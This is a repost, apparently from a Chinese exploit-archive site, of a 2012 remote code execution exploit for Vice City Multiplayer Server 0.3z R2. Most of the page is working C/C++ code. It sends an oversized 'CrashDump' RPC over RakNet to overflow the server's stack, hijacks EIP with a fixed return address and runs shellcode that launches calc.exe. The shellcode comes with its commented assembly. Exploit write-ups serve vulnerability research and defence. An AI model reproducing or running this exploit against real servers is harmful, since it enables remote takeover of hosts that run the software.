首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Vice City Multiplayer Server 0.3z R2 Remote Code Execution
来源:http://sasuke78200.blogspot.fr/ 作者:Sasuke78200 发布时间:2012-08-24  
Exploit Title: Vice City Multiplayer remote code execution (Server)
Date: 22/08/2012
Exploit Author: Sasuke78200 (Benjaa Toufik)
Software Link:
http://www.vicecitymultiplayer.com/downloads/03z_r2/server0.3zr2(pawn)(win)(updated2).zip
Version: 0.3z R2
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
Windows Server 2008, it should work on all Windows.

#include "main.h"

/*
    Written by Sasuke78200
    http://sasuke78200.blogspot.fr/

*/


RakClientInterface* pClientInterface;


void Exploit()
{
    unsigned long iLen;
    unsigned char aBuffer[4096];
    RakNet::BitStream* pBitStream;

    unsigned char aShellCode[] =
    {
        0xE8, 0x25, 0x00, 0x00, 0x00, 0x5B, 0x81, 0xEC,
        0x80, 0x00, 0x00, 0x00, 0x6A, 0x01, 0x6A, 0x00,
        0x6A, 0x00, 0x53, 0x68, 0x78, 0x82, 0x44, 0x00,
        0x6A, 0x00, 0xB8, 0x94, 0x61, 0x44, 0x00, 0xFF,
        0x10, 0x6A, 0x00, 0xB8, 0x00, 0x61, 0x44, 0x00,
        0xFF, 0x10, 0xE8, 0xD6, 0xFF, 0xFF, 0xFF, 0x63,
        0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00
/* Compiled version of */
        //USE32
    
        //_start:
        //  call _string

        //_begin:
        //  pop     ebx
        //  sub     esp, 0x80

        //  ; ShellExecuteA(0, "open", "calc.exe", 0, 0, SW_SHOWNORMAL);
        //  push    1
        //  push    0
        //  push    0
        //  push    ebx
        //  push    0x448278    ; offset of "open" on the server
        //  push    0x00
        //  mov     eax, 0x446194
        //  call    [eax]

        //  ; ExitProcess(0); To avoid a crash
        //  push    0
        //  mov     eax, 0x446100
        //  call    [eax]
    
        //_string:
        //  call _begin
        //  db "calc.exe"
        //  db 0
    };

    pBitStream = new RakNet::BitStream();

    memset(aBuffer, 0x49, sizeof(aBuffer));

    iLen = 588; // limit of the stack on Windows

    // New EIP (stack pointer)

    *(unsigned long*)&aBuffer[iLen] = 0x4165E6;     // Windows
    iLen += 4; // EIP
    *(unsigned long*)&aBuffer[iLen] = 0x90909090;
    iLen += 4;
    memcpy(&aBuffer[iLen], aShellCode, sizeof(aShellCode));
    iLen += sizeof(aShellCode);



    pBitStream->Write((unsigned int)iLen);
    pBitStream->Write((char*)aBuffer, iLen);


    pClientInterface->RPC("CrashDump", pBitStream, HIGH_PRIORITY, RELIABLE, 0, false, UNASSIGNED_NETWORK_ID, 0);
    delete pBitStream;
}

int main()
{

    Packet* pPacket;

    pClientInterface = RakNetworkFactory::GetRakClientInterface();
    pClientInterface->Connect("127.0.0.1", 5192, 0, 0, 20);


    for(;;)
    {
        while((pPacket = pClientInterface->Receive()) != 0)
        {
            switch(pPacket->data[0])
            {
            case ID_CONNECTION_REQUEST_ACCEPTED:
                {
                    puts("Connected ...");
                    Exploit();
                    break;
                }
            case ID_CONNECTION_LOST:
                {
                    puts("Connection time out\nCode executed ? :)");
                    break;
                }
            case ID_RECEIVED_STATIC_DATA:
                {
                    break;
                }
            default:
                {
                    printf("packet id %d received lenght %d bytes\n", pPacket->data[0], pPacket->length);
                }
            }

            pClientInterface->DeallocatePacket(pPacket);
        }


    }

    return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache Struts2 Remote Code Exe
·XODA 0.4.5 Arbitrary PHP File
·WireShark 1.8.2 & 1.6.0 Buffer
·E-Mail Security Virtual Applia
·Express Burn Plus 4.58 Buffer
·SAP Netweaver Dispatcher 7.0 E
·Java 7 Applet Remote Code Exec
·Symantec Web Gateway <= 5.0.3.
·Zabbix Server Arbitrary Comman
·Symantec Web Gateway <= 5.0.3.
·Java 7 Applet Remote Code Exec
·Sysax Multi Server 5.64 Create
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved